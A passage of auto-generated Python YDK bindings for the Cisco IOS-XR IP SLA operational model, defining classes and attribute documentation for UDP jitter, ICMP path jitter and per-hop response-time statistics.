Packets lost in source to destination (SD) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_ds
Packets lost in destination to source (DS) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_out_of_sequence
Packets out of sequence
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_mia
Packets missing in action (cannot determine if theywere lost in SD or DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_skipped
Packets which are skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_late_arrivals
Packets arriving late
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_invalid_tstamp
Packets with bad timestamps
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_errors_count
Number of internal errors
**type**\: int
**range:** 0..4294967295
.. attribute:: busies_count
Number of busies
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_sd_sum2
Sum of squares of positive jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_sd_min
Minimum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_max
Maximum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_count
Number of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_sd_sum2
Sum of squares of negative jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_sd_min
Minimum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_max
Maximum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_count
Number of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_ds_sum2
Sum of squares of positive jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_ds_min
Minimum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_max
Maximum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_count
Number of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_ds_sum2
Sum of squares of negative jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_ds_min
Minimum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_max
Maximum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_count
Number of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_count
Number of probe/probe\-response pairs used to compute one\-way statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_min
Minimum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_max
Maximum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum
Sum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum2
Sum of squares of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: one_way_ds_min
Minimum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_max
Maximum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum
Sum of one\-way jitter values in DS direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_ds_sum2
Sum of squares of the OneWayMinDS and OneWayMaxDS values (msec)
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats, self).__init__()
self.yang_name = "udp-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('jitter_in', YLeaf(YType.uint32, 'jitter-in')),
('jitter_out', YLeaf(YType.uint32, 'jitter-out')),
('packet_loss_sd', YLeaf(YType.uint32, 'packet-loss-sd')),
('packet_loss_ds', YLeaf(YType.uint32, 'packet-loss-ds')),
('packet_out_of_sequence', YLeaf(YType.uint32, 'packet-out-of-sequence')),
('packet_mia', YLeaf(YType.uint32, 'packet-mia')),
('packet_skipped', YLeaf(YType.uint32, 'packet-skipped')),
('packet_late_arrivals', YLeaf(YType.uint32, 'packet-late-arrivals')),
('packet_invalid_tstamp', YLeaf(YType.uint32, 'packet-invalid-tstamp')),
('internal_errors_count', YLeaf(YType.uint32, 'internal-errors-count')),
('busies_count', YLeaf(YType.uint32, 'busies-count')),
('positive_sd_sum', YLeaf(YType.uint32, 'positive-sd-sum')),
('positive_sd_sum2', YLeaf(YType.uint64, 'positive-sd-sum2')),
('positive_sd_min', YLeaf(YType.uint32, 'positive-sd-min')),
('positive_sd_max', YLeaf(YType.uint32, 'positive-sd-max')),
('positive_sd_count', YLeaf(YType.uint32, 'positive-sd-count')),
('negative_sd_sum', YLeaf(YType.uint32, 'negative-sd-sum')),
('negative_sd_sum2', YLeaf(YType.uint64, 'negative-sd-sum2')),
('negative_sd_min', YLeaf(YType.uint32, 'negative-sd-min')),
('negative_sd_max', YLeaf(YType.uint32, 'negative-sd-max')),
('negative_sd_count', YLeaf(YType.uint32, 'negative-sd-count')),
('positive_ds_sum', YLeaf(YType.uint32, 'positive-ds-sum')),
('positive_ds_sum2', YLeaf(YType.uint64, 'positive-ds-sum2')),
('positive_ds_min', YLeaf(YType.uint32, 'positive-ds-min')),
('positive_ds_max', YLeaf(YType.uint32, 'positive-ds-max')),
('positive_ds_count', YLeaf(YType.uint32, 'positive-ds-count')),
('negative_ds_sum', YLeaf(YType.uint32, 'negative-ds-sum')),
('negative_ds_sum2', YLeaf(YType.uint64, 'negative-ds-sum2')),
('negative_ds_min', YLeaf(YType.uint32, 'negative-ds-min')),
('negative_ds_max', YLeaf(YType.uint32, 'negative-ds-max')),
('negative_ds_count', YLeaf(YType.uint32, 'negative-ds-count')),
('one_way_count', YLeaf(YType.uint32, 'one-way-count')),
('one_way_sd_min', YLeaf(YType.uint32, 'one-way-sd-min')),
('one_way_sd_max', YLeaf(YType.uint32, 'one-way-sd-max')),
('one_way_sd_sum', YLeaf(YType.uint32, 'one-way-sd-sum')),
('one_way_sd_sum2', YLeaf(YType.uint64, 'one-way-sd-sum2')),
('one_way_ds_min', YLeaf(YType.uint32, 'one-way-ds-min')),
('one_way_ds_max', YLeaf(YType.uint32, 'one-way-ds-max')),
('one_way_ds_sum', YLeaf(YType.uint32, 'one-way-ds-sum')),
('one_way_ds_sum2', YLeaf(YType.uint64, 'one-way-ds-sum2')),
])
self.jitter_in = None
self.jitter_out = None
self.packet_loss_sd = None
self.packet_loss_ds = None
self.packet_out_of_sequence = None
self.packet_mia = None
self.packet_skipped = None
self.packet_late_arrivals = None
self.packet_invalid_tstamp = None
self.internal_errors_count = None
self.busies_count = None
self.positive_sd_sum = None
self.positive_sd_sum2 = None
self.positive_sd_min = None
self.positive_sd_max = None
self.positive_sd_count = None
self.negative_sd_sum = None
self.negative_sd_sum2 = None
self.negative_sd_min = None
self.negative_sd_max = None
self.negative_sd_count = None
self.positive_ds_sum = None
self.positive_ds_sum2 = None
self.positive_ds_min = None
self.positive_ds_max = None
self.positive_ds_count = None
self.negative_ds_sum = None
self.negative_ds_sum2 = None
self.negative_ds_min = None
self.negative_ds_max = None
self.negative_ds_count = None
self.one_way_count = None
self.one_way_sd_min = None
self.one_way_sd_max = None
self.one_way_sd_sum = None
self.one_way_sd_sum2 = None
self.one_way_ds_min = None
self.one_way_ds_max = None
self.one_way_ds_sum = None
self.one_way_ds_sum2 = None
self._segment_path = lambda: "udp-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Target.SpecificStats.UdpJitterStats, ['jitter_in', 'jitter_out', 'packet_loss_sd', 'packet_loss_ds', 'packet_out_of_sequence', 'packet_mia', 'packet_skipped', 'packet_late_arrivals', 'packet_invalid_tstamp', 'internal_errors_count', 'busies_count', 'positive_sd_sum', 'positive_sd_sum2', 'positive_sd_min', 'positive_sd_max', 'positive_sd_count', 'negative_sd_sum', 'negative_sd_sum2', 'negative_sd_min', 'negative_sd_max', 'negative_sd_count', 'positive_ds_sum', 'positive_ds_sum2', 'positive_ds_min', 'positive_ds_max', 'positive_ds_count', 'negative_ds_sum', 'negative_ds_sum2', 'negative_ds_min', 'negative_ds_max', 'negative_ds_count', 'one_way_count', 'one_way_sd_min', 'one_way_sd_max', 'one_way_sd_sum', 'one_way_sd_sum2', 'one_way_ds_min', 'one_way_ds_max', 'one_way_ds_sum', 'one_way_ds_sum2'], name, value)
class Hops(Entity):
"""
Latest statistics for hops in a
path\-enabled operation
.. attribute:: hop
Latest stats for a hop in a path\-enabled operation
**type**\: list of :py:class:`Hop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops, self).__init__()
self.yang_name = "hops"
self.yang_parent_name = "latest"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("hop", ("hop", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop))])
self._leafs = OrderedDict()
self.hop = YList(self)
self._segment_path = lambda: "hops"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops, [], name, value)
class Hop(Entity):
"""
Latest stats for a hop in a path\-enabled
operation
.. attribute:: hop_index (key)
Hop Index
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common_stats
Common Stats
**type**\: :py:class:`CommonStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats>`
.. attribute:: specific_stats
Operation Specific Stats
**type**\: :py:class:`SpecificStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop, self).__init__()
self.yang_name = "hop"
self.yang_parent_name = "hops"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hop_index']
self._child_container_classes = OrderedDict([("common-stats", ("common_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats)), ("specific-stats", ("specific_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('hop_index', YLeaf(YType.int32, 'hop-index')),
])
self.hop_index = None
self.common_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats()
self.common_stats.parent = self
self._children_name_map["common_stats"] = "common-stats"
self._children_yang_names.add("common-stats")
self.specific_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats()
self.specific_stats.parent = self
self._children_name_map["specific_stats"] = "specific-stats"
self._children_yang_names.add("specific-stats")
self._segment_path = lambda: "hop" + "[hop-index='" + str(self.hop_index) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop, ['hop_index'], name, value)
class CommonStats(Entity):
"""
Common Stats
.. attribute:: operation_time
Operation Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
Return code
**type**\: :py:class:`IpslaRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaRetCode>`
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: update_count
Number of updates processed
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of updates with Okay return code
**type**\: int
**range:** 0..4294967295
.. attribute:: disconnect_count
Number of updates with Disconnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of updates with Timeout return code
**type**\: int
**range:** 0..4294967295
.. attribute:: busy_count
Number of updates with Busy return code
**type**\: int
**range:** 0..4294967295
.. attribute:: no_connection_count
Number of updates with NotConnected return code
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_count
Number of updates with Dropped return code
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of updates with InternalError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: sequence_error_count
Number of updates with SeqError return code
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_error_count
Number of updates with VerifyError return code
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats, self).__init__()
self.yang_name = "common-stats"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_time', YLeaf(YType.uint64, 'operation-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('update_count', YLeaf(YType.uint32, 'update-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('disconnect_count', YLeaf(YType.uint32, 'disconnect-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('busy_count', YLeaf(YType.uint32, 'busy-count')),
('no_connection_count', YLeaf(YType.uint32, 'no-connection-count')),
('dropped_count', YLeaf(YType.uint32, 'dropped-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('sequence_error_count', YLeaf(YType.uint32, 'sequence-error-count')),
('verify_error_count', YLeaf(YType.uint32, 'verify-error-count')),
])
self.operation_time = None
self.return_code = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.update_count = None
self.ok_count = None
self.disconnect_count = None
self.timeout_count = None
self.busy_count = None
self.no_connection_count = None
self.dropped_count = None
self.internal_error_count = None
self.sequence_error_count = None
self.verify_error_count = None
self._segment_path = lambda: "common-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.CommonStats, ['operation_time', 'return_code', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'update_count', 'ok_count', 'disconnect_count', 'timeout_count', 'busy_count', 'no_connection_count', 'dropped_count', 'internal_error_count', 'sequence_error_count', 'verify_error_count'], name, value)
class SpecificStats(Entity):
"""
Operation Specific Stats
.. attribute:: icmp_path_jitter_stats
icmp path jitter stats
**type**\: :py:class:`IcmpPathJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats>`
.. attribute:: udp_jitter_stats
udp jitter stats
**type**\: :py:class:`UdpJitterStats <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats>`
.. attribute:: op_type
op type
**type**\: :py:class:`OpTypeEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.OpTypeEnum>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats, self).__init__()
self.yang_name = "specific-stats"
self.yang_parent_name = "hop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("icmp-path-jitter-stats", ("icmp_path_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats)), ("udp-jitter-stats", ("udp_jitter_stats", Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('op_type', YLeaf(YType.enumeration, 'op-type')),
])
self.op_type = None
self.icmp_path_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats()
self.icmp_path_jitter_stats.parent = self
self._children_name_map["icmp_path_jitter_stats"] = "icmp-path-jitter-stats"
self._children_yang_names.add("icmp-path-jitter-stats")
self.udp_jitter_stats = Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.UdpJitterStats()
self.udp_jitter_stats.parent = self
self._children_name_map["udp_jitter_stats"] = "udp-jitter-stats"
self._children_yang_names.add("udp-jitter-stats")
self._segment_path = lambda: "specific-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats, ['op_type'], name, value)
class IcmpPathJitterStats(Entity):
"""
icmp path jitter stats
.. attribute:: source_address
IP Address of the source
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: dest_address
IP Address of the destination
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: hop_address
IP address of the hop in the path
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: packet_interval
Interval between echos in ms
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time_count
Number of RTT samples used for the statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: response_time
RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: min_response_time
Minimum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_response_time
Maximum RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_response_time
Sum of RTT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum2_response_time
Sum of RTT^2
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: packet_count
Number of Echo replies received
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_count
Number of packets lost
**type**\: int
**range:** 0..4294967295
.. attribute:: out_of_sequence_count
Number of out of sequence packets
**type**\: int
**range:** 0..4294967295
.. attribute:: discarded_sample_count
Number of discarded samples
**type**\: int
**range:** 0..4294967295
.. attribute:: verify_errors_count
Number of packets with data corruption
**type**\: int
**range:** 0..4294967295
.. attribute:: dropped_error_count
Number of packets dropped
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter
Jitter value for this node in the path
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum
Sum of positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_sum2
Sum of squares of positive jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: pos_jitter_min
Minimum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_max
Maximum positive jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: pos_jitter_count
Number of positive jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum
Sum of negative jitter values
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_min
Minimum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_max
Maximum negative jitter value
**type**\: int
**range:** 0..4294967295
.. attribute:: neg_jitter_sum2
Sum of squares of negative jitter values
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: neg_jitter_count
Number of negative jitter values
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats, self).__init__()
self.yang_name = "icmp-path-jitter-stats"
self.yang_parent_name = "specific-stats"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('source_address', YLeaf(YType.str, 'source-address')),
('dest_address', YLeaf(YType.str, 'dest-address')),
('hop_address', YLeaf(YType.str, 'hop-address')),
('packet_interval', YLeaf(YType.uint32, 'packet-interval')),
('response_time_count', YLeaf(YType.uint32, 'response-time-count')),
('response_time', YLeaf(YType.uint32, 'response-time')),
('min_response_time', YLeaf(YType.uint32, 'min-response-time')),
('max_response_time', YLeaf(YType.uint32, 'max-response-time')),
('sum_response_time', YLeaf(YType.uint32, 'sum-response-time')),
('sum2_response_time', YLeaf(YType.uint64, 'sum2-response-time')),
('packet_count', YLeaf(YType.uint32, 'packet-count')),
('packet_loss_count', YLeaf(YType.uint32, 'packet-loss-count')),
('out_of_sequence_count', YLeaf(YType.uint32, 'out-of-sequence-count')),
('discarded_sample_count', YLeaf(YType.uint32, 'discarded-sample-count')),
('verify_errors_count', YLeaf(YType.uint32, 'verify-errors-count')),
('dropped_error_count', YLeaf(YType.uint32, 'dropped-error-count')),
('jitter', YLeaf(YType.uint32, 'jitter')),
('pos_jitter_sum', YLeaf(YType.uint32, 'pos-jitter-sum')),
('pos_jitter_sum2', YLeaf(YType.uint64, 'pos-jitter-sum2')),
('pos_jitter_min', YLeaf(YType.uint32, 'pos-jitter-min')),
('pos_jitter_max', YLeaf(YType.uint32, 'pos-jitter-max')),
('pos_jitter_count', YLeaf(YType.uint32, 'pos-jitter-count')),
('neg_jitter_sum', YLeaf(YType.uint32, 'neg-jitter-sum')),
('neg_jitter_min', YLeaf(YType.uint32, 'neg-jitter-min')),
('neg_jitter_max', YLeaf(YType.uint32, 'neg-jitter-max')),
('neg_jitter_sum2', YLeaf(YType.uint64, 'neg-jitter-sum2')),
('neg_jitter_count', YLeaf(YType.uint32, 'neg-jitter-count')),
])
self.source_address = None
self.dest_address = None
self.hop_address = None
self.packet_interval = None
self.response_time_count = None
self.response_time = None
self.min_response_time = None
self.max_response_time = None
self.sum_response_time = None
self.sum2_response_time = None
self.packet_count = None
self.packet_loss_count = None
self.out_of_sequence_count = None
self.discarded_sample_count = None
self.verify_errors_count = None
self.dropped_error_count = None
self.jitter = None
self.pos_jitter_sum = None
self.pos_jitter_sum2 = None
self.pos_jitter_min = None
self.pos_jitter_max = None
self.pos_jitter_count = None
self.neg_jitter_sum = None
self.neg_jitter_min = None
self.neg_jitter_max = None
self.neg_jitter_sum2 = None
self.neg_jitter_count = None
self._segment_path = lambda: "icmp-path-jitter-stats"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Statistics.Latest.Hops.Hop.SpecificStats.IcmpPathJitterStats, ['source_address', 'dest_address', 'hop_address', 'packet_interval', 'response_time_count', 'response_time', 'min_response_time', 'max_response_time', 'sum_response_time', 'sum2_response_time', 'packet_count', 'packet_loss_count', 'out_of_sequence_count', 'discarded_sample_count', 'verify_errors_count', 'dropped_error_count', 'jitter', 'pos_jitter_sum', 'pos_jitter_sum2', 'pos_jitter_min', 'pos_jitter_max', 'pos_jitter_count', 'neg_jitter_sum', 'neg_jitter_min', 'neg_jitter_max', 'neg_jitter_sum2', 'neg_jitter_count'], name, value)
class UdpJitterStats(Entity):
"""
udp jitter stats
.. attribute:: jitter_in
Input Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: jitter_out
Output Jitter moving average, computed as per RFC1889
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_sd
Packets lost in source to destination (SD) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_loss_ds
Packets lost in destination to source (DS) direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_out_of_sequence
Packets out of sequence
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_mia
Packets missing in action (cannot determine if theywere lost in SD or DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_skipped
Packets which are skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_late_arrivals
Packets arriving late
**type**\: int
**range:** 0..4294967295
.. attribute:: packet_invalid_tstamp
Packets with bad timestamps
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_errors_count
Number of internal errors
**type**\: int
**range:** 0..4294967295
.. attribute:: busies_count
Number of busies
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_sd_sum2
Sum of squares of positive jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_sd_min
Minimum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_max
Maximum of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_sd_count
Number of positive jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in SD direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_sd_sum2
Sum of squares of negative jitter values in SD direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_sd_min
Minimum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_max
Maximum of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_sd_count
Number of negative jitter values in SD direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_sum
Sum of positive jitter values (i.e., network latency increases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: positive_ds_sum2
Sum of squares of positive jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: positive_ds_min
Minimum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_max
Maximum of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: positive_ds_count
Number of positive jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_sum
Sum of negative jitter values (i.e., network latency decreases for two consecutive packets) in DS direction Measured in milliseconds
**type**\: int
**range:** 0..4294967295
**units**\: millisecond
.. attribute:: negative_ds_sum2
Sum of squares of negative jitter values in DS direction
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: negative_ds_min
Minimum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_max
Maximum of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: negative_ds_count
Number of negative jitter values in DS direction
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_count
Number of probe/probe\-response pairs used to compute one\-way statistics
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_min
Minimum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_max
Maximum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum
Sum of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..4294967295
.. attribute:: one_way_sd_sum2
Sum of squares of one\-way jitter values in SD direction (msec)
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: one_way_ds_min
